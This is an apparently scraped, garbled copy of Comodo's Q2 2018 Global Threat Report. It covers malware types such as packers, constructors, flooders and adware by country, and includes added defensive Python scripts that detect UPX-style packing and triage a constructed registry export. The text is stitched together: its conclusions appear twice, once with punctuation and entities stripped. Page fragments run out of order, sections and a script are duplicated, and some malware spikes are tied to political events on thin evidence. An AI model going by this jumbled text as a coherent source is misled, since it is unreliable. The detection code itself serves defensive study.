In Q2, Comodo Cybersecurity observed several significant new trends that are likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The increase in trojan detections in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
This timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packing" refers to any means of hiding or obfuscating malicious executable code by compressing it within larger, seemingly innocuous software or data streams; the hostile code can even come in the form of scripts. The compressed payload is usually accompanied by a separate decompression stub, or even a self-extracting archive, which recreates the original code from the compressed form at run time and then executes the malware. Encryption may also be used to conceal the malware from security software, as a further means of obfuscating the attack.
MUPX, a modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open source software that is compatible with numerous file formats and operating systems; it uses the open source UCL compression library, whose decompressor is only a few hundred bytes of code, which is why a packed binary needs so little stub code to unpack itself in memory.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
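As an added example (not code from the report or from Comodo), the following Python script shows how the packing described above can be recognised statically without relying on the stock UPX signature: it parses the PE section table, computes per-section Shannon entropy, and checks for the layout a UPX-style stub leaves behind (an empty first section reserved for the unpacked image, and sections that are both writable and executable). The packer section-name list, the 7.0 bits/byte entropy threshold and the two-indicator verdict are the author's assumptions, and the three PE images are constructed inside the script, not real samples. Standard library only.

```python
"""Static packer triage for PE files: known packer section names, the UPX!
marker, the empty-first-section layout, RWX sections and high entropy in
executable sections. Thresholds and name list are assumptions, not a standard."""
import hashlib
import math
import struct
from dataclasses import dataclass

# Section names left by common packers. A modified UPX build (the MUPX the
# report describes) usually renames these, so name matching alone is weak.
PACKER_SECTION_NAMES = {
    "UPX0", "UPX1", "UPX2",         # UPX
    ".MPRESS1", ".MPRESS2",         # MPRESS
    ".aspack", ".adata",            # ASPack
    ".petite",                      # Petite
    ".themida", ".vmp0", ".vmp1",   # Themida, VMProtect
}
HIGH_ENTROPY = 7.0  # bits/byte; compressed or encrypted data usually exceeds this (assumed cut-off)

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_size: int
    raw_size: int
    raw_offset: int
    characteristics: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 for empty input, 8.0 maximum)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt
    sections = []
    for i in range(nsections):
        (name, vsize, _va, raw_size, raw_off,
         _rel, _ln, _nrel, _nln, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_off:raw_off + raw_size] if raw_size else b""
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vsize, raw_size, raw_off, chars, shannon_entropy(raw)))
    return sections


def packer_indicators(pe: bytes) -> list:
    """Human-readable indicators; an empty list means nothing suspicious was seen."""
    sections = parse_sections(pe)
    hits = []
    for s in sections:
        if s.name in PACKER_SECTION_NAMES:
            hits.append(f"known packer section name {s.name}")
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.characteristics & IMAGE_SCN_MEM_WRITE:
            hits.append(f"section {s.name} is writable and executable")
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.entropy >= HIGH_ENTROPY:
            hits.append(f"executable section {s.name} has entropy {s.entropy:.2f}")
    # UPX-style layout: the first section holds nothing on disk but reserves the
    # memory the stub decompresses the original image into at run time.
    if sections and sections[0].raw_size == 0 and sections[0].virtual_size > 0:
        hits.append(f"first section {sections[0].name} is empty on disk but mapped in memory")
    if b"UPX!" in pe:
        hits.append("UPX! marker present (usually stripped in modified builds)")
    return hits


def is_probably_packed(pe: bytes) -> bool:
    """Assumed verdict rule: two independent indicators."""
    return len(packer_indicators(pe)) >= 2


# ---- constructed samples (not real malware; headers are the minimum the parser needs) ----
def build_pe(specs) -> bytes:
    """specs: (name, raw_data, virtual_size, characteristics) per section."""
    size_opt = 224                                  # PE32 optional header, left zeroed
    table_off = 0x40 + 4 + 20 + size_opt
    data_off = (table_off + 40 * len(specs) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)
    table, body, va = b"", b"", 0x1000
    for name, raw, vsize, chars in specs:
        raw_size = (len(raw) + 0x1FF) & ~0x1FF
        raw_off = data_off + len(body) if raw else 0
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va,
                             raw_size, raw_off, 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        va += (max(vsize, raw_size) + 0xFFF) & ~0xFFF
    return (dos + b"PE\0\0" + coff + opt + table).ljust(data_off, b"\0") + body


def pseudo_random_bytes(n: int, seed: bytes = b"packed") -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RX_CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
# Stock UPX: telltale names, UPX! marker, empty UPX0, high-entropy UPX1.
PACKED_SAMPLE = build_pe([(b"UPX0", b"", 0x20000, RWX),
                          (b"UPX1", pseudo_random_bytes(0x1000 - 4) + b"UPX!", 0x2000, RWX)])
# Modified UPX: names and marker stripped, but layout and entropy unchanged.
MODIFIED_SAMPLE = build_pe([(b".text", b"", 0x20000, RWX),
                            (b".data", pseudo_random_bytes(0x1000, b"mupx"), 0x2000, RWX)])
# Unpacked: low-entropy code in a read-only executable section, ordinary data.
CLEAN_SAMPLE = build_pe([(b".text", bytes(range(16)) * 256, 0x1000, RX_CODE),
                         (b".data", b"Hello, world\0" * 300, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)])

if __name__ == "__main__":
    for label, pe in [("stock UPX", PACKED_SAMPLE), ("modified UPX", MODIFIED_SAMPLE), ("clean", CLEAN_SAMPLE)]:
        print(f"{label}: packed={is_probably_packed(pe)}", *packer_indicators(pe), sep="\n   ")
```

Run as a script, it lists the indicators that fire for each sample. The point of the second sample is the one that matters for MUPX: a build that renames its sections and strips the UPX! marker defeats signature matching and a plain `upx -d`, but the empty-first-section layout, the writable-and-executable sections and the near-8.0 entropy of the compressed body remain, so triage should lean on those rather than on names.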
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
Global Threat Report Q2 2018 Edition
Page 52 of 73
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the number one constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
This timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing ("packing") it inside a larger, seemingly innocuous program or data stream. The hostile code can even come in the form of scripts. The compressed data is usually accompanied by a small decompression stub, or shipped as a self-extracting archive, which recreates the original code from the compressed form at run time and then executes it. Encryption may also be layered on top as a further means of concealing the payload from security software. Because the unpacked code exists only in memory, signature scanners see just the stub and the compressed blob, so static triage relies on the side effects of packing instead: packer-specific section names, unusually high byte entropy, and sections that occupy far more space in memory than on disk.
MUPX, the "Modified Ultimate Packer for Executables", dominated this part of the malware landscape. The underlying UPX is free, open-source software that supports numerous executable formats across different operating systems and relies on the open-source UCL compression library, whose decompressor is only a few hundred bytes of code; MUPX denotes samples whose UPX packer has been modified from the stock release.
In Q2 2018, Russia was the number one home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
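The indicators a triage script can check for a packed executable, as an added example written for this page in Python rather than code from the Comodo report: it parses the PE section table and flags stock UPX section names, a section that is empty on disk but large in memory (the unpack target), and high byte entropy in a section's data. The PE images it scans are constructed in memory by build_pe() rather than taken from any sample, and the 7.0 bits/byte entropy cutoff is an assumption.

```python
"""Static packer triage for a PE file: stock UPX section names, a section that is
empty on disk but large in memory (the unpack target), and high byte entropy.
Added example, not code from the Comodo report; the PE images at the bottom are
built in memory by build_pe() so the script runs offline on constructed input."""
import math
import random
import struct
from typing import Dict, List, Tuple

E_LFANEW_OFFSET = 0x3C        # DOS header field holding the offset of "PE\0\0"
COFF_HEADER_LEN = 20
SECTION_HEADER_LEN = 40
COFF_FMT = "<HHIIIHH"         # Machine, NumberOfSections, ..., SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
ENTROPY_LIMIT = 7.0           # assumed cutoff; compiled code is usually ~4-6 bits/byte, compressed data ~7.9


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the buffer (0.0 for empty input, 8.0 for uniform random bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> List[Dict[str, object]]:
    """Walk DOS header -> PE signature -> COFF header -> section table and return one
    dict per section with its name, sizes and the entropy of its on-disk bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, E_LFANEW_OFFSET)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, num_sections, _, _, _, opt_len, _ = struct.unpack_from(COFF_FMT, image, coff_off)
    table = coff_off + COFF_HEADER_LEN + opt_len
    sections = []
    for i in range(num_sections):
        name, vsize, _va, raw_size, raw_ptr, *_ = struct.unpack_from(
            SECTION_FMT, image, table + i * SECTION_HEADER_LEN)
        data = image[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0"), "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(data)})
    return sections


def packer_indicators(image: bytes) -> List[str]:
    """Reasons the image looks packed; an empty list means nothing stood out.
    Each rule is a heuristic: renamed sections defeat the first one, which is why
    the size-gap and entropy rules are checked as well."""
    reasons = []
    for s in parse_sections(image):
        label = s["name"].decode("ascii", "replace")
        if s["name"] in UPX_SECTION_NAMES:
            reasons.append(f"section {label}: stock UPX section name")
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            reasons.append(f"section {label}: 0 bytes on disk but {s['virtual_size']:#x} "
                           "bytes reserved in memory (typical unpack target)")
        if s["raw_size"] >= 256 and s["entropy"] > ENTROPY_LIMIT:
            reasons.append(f"section {label}: entropy {s['entropy']:.2f} > {ENTROPY_LIMIT}")
    return reasons


def build_pe(sections: List[Tuple[bytes, int, bytes]]) -> bytes:
    """Assemble a minimal PE image from (name, virtual_size, raw_bytes) tuples. Only
    the fields parse_sections() reads are meaningful; everything else is zero, so
    the result is a test fixture, not a loadable executable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (E_LFANEW_OFFSET - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    raw_ptr = e_lfanew + 4 + COFF_HEADER_LEN + SECTION_HEADER_LEN * len(sections)
    headers, body, va = b"", b"", 0x1000
    for name, vsize, raw in sections:
        headers += struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, va, len(raw),
                               raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        body += raw
        raw_ptr += len(raw)
        va += max(0x1000, (vsize + 0xFFF) & ~0xFFF)
    return dos + b"PE\0\0" + coff + headers + body


def pseudo_random(n: int, seed: int = 1) -> bytes:
    """Deterministic high-entropy filler standing in for compressed data."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed fixtures (not real samples): a plain image whose .text has moderate
# entropy, and a UPX-style image with an empty UPX0 and a high-entropy UPX1.
PLAIN_PE = build_pe([(b".text", 0x400, bytes(range(64)) * 16),
                     (b".data", 0x200, b"\0" * 512)])
PACKED_PE = build_pe([(b"UPX0", 0x8000, b""),
                      (b"UPX1", 0x2000, pseudo_random(4096)),
                      (b".rsrc", 0x200, b"\0" * 512)])

if __name__ == "__main__":
    for tag, img in (("plain", PLAIN_PE), ("packed", PACKED_PE)):
        print(tag, packer_indicators(img) or ["no packer indicators"])
```

A modified packer that renames its sections defeats only the first rule; the size-gap and entropy rules still fire, which is why triage should never key on the section name alone. On a real file, replace the fixtures with the bytes of the file read from disk.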
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
This timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what the name says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
This timeline shows that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover the range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nevertheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings. Each of those actions leaves a footprint that can be audited: autostart registry entries and services, newly registered drivers, and static name-server and browser-homepage settings that differ from what the network or the user configured.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such bundles include free toolbars, adware and "system optimizers".
As the bubble chart shows, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
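The audit that the Elex and DealPly behaviors described above call for, written here in Python as an added example (not code from the Comodo report or from Microsoft): it parses a registry export of the kind `reg export` or Registry Editor produces and flags autostart entries in user-writable directories, kernel drivers whose image lives outside System32\drivers, a static NameServer that differs from the DHCP-supplied one, and a replaced Internet Explorer start page. The export text, the directory list and the default-start-page prefixes are constructed assumptions for the example, not a vendor signature set.

```python
"""Triage of a Windows registry export (.reg text) for autostart entries in user-writable
paths, drivers outside System32\\drivers, static DNS overrides and a replaced start page.
Added example, not code from the Comodo report; the export and path lists are assumptions."""
import re
from typing import Dict, List, Tuple

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
RUN_KEY_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")
SERVICES_PATH = "\\currentcontrolset\\services\\"
DRIVER_TYPES = {1, 2}                      # SERVICE_KERNEL_DRIVER, SERVICE_FILE_SYSTEM_DRIVER
DEFAULT_START_PAGES = ("http://go.microsoft.com/", "https://go.microsoft.com/")  # assumed

def _unescape(s: str) -> str:
    """Undo .reg string escaping in one left-to-right pass: \\\\ -> \\ and \\" -> a quote."""
    return re.sub(r'\\(["\\])', r"\1", s)

def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """{key_path: {value_name: value}}; strings unescaped, dwords as int, other types raw."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$', line)
        if m is None or current is None:
            continue
        name = "@" if m.group(1) is None else _unescape(m.group(1))
        val = m.group(2)
        if len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            keys[current][name] = _unescape(val[1:-1])
        elif val.startswith("dword:"):
            keys[current][name] = int(val[6:], 16)
        else:
            keys[current][name] = val
    return keys

def exe_path(command: str) -> str:
    """Executable part of a Run value: the quoted path, or the text before the first space."""
    command = command.strip()
    if command.startswith('"') and command.find('"', 1) > 0:
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]

def triage(keys: Dict[str, Dict[str, object]]) -> List[Tuple[str, str]]:
    """(kind, detail) findings. Deliberately broad: a legitimate per-user installer such as
    OneDrive trips the startup rule too, so the follow-up is a signature or hash check."""
    findings: List[Tuple[str, str]] = []
    for key, values in keys.items():
        lk = key.lower()
        if lk.endswith(RUN_KEY_SUFFIXES):
            for name, cmd in values.items():
                path = exe_path(str(cmd)).lower()
                if any(d in path for d in USER_WRITABLE):
                    findings.append(("startup", f"{key}\\{name} -> {path}"))
        elif SERVICES_PATH in lk and values.get("Type") in DRIVER_TYPES:
            image = str(values.get("ImagePath", "")).lower()
            if "\\system32\\drivers\\" not in image:
                findings.append(("driver", f"{key} ImagePath={image}"))
        elif "\\tcpip\\parameters" in lk and values.get("NameServer"):
            if values["NameServer"] != values.get("DhcpNameServer", ""):
                findings.append(("dns", f"{key} NameServer={values['NameServer']}"))
        elif lk.endswith("\\internet explorer\\main") and "Start Page" in values:
            page = str(values["Start Page"])
            if not page.lower().startswith(DEFAULT_START_PAGES):
                findings.append(("browser", f"{key} Start Page={page}"))
    return findings

# Constructed export (not captured from a real host): one clean HKLM Run entry, two per-user
# Run entries from AppData, a driver under ProgramData, a static DNS override, a bundled start page.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svc_update"="C:\\Users\\alice\\AppData\\Roaming\\svcupd\\upd.exe -s"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmpfilt]
"Type"=dword:00000001
"ImagePath"="\\??\\C:\\ProgramData\\tmpfilt\\tmpfilt.sys"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0F1A2B3C-0000-4000-8000-000000000001}]
"DhcpNameServer"="192.0.2.1"
"NameServer"="198.51.100.7,198.51.100.8"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://search.example/?src=bundle"
'''
```

Running triage(parse_reg(SAMPLE_REG)) yields five findings: both per-user Run entries (OneDrive included, which is the point of the comment in triage()), the driver, the DNS override and the start page. An allowlist by file name would be the wrong fix for the OneDrive hit, since anything can be named onedrive.exe; verifying the signer or hash of the flagged file is the check that survives renaming.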
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users then install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are number 2 and number 3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the number one malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
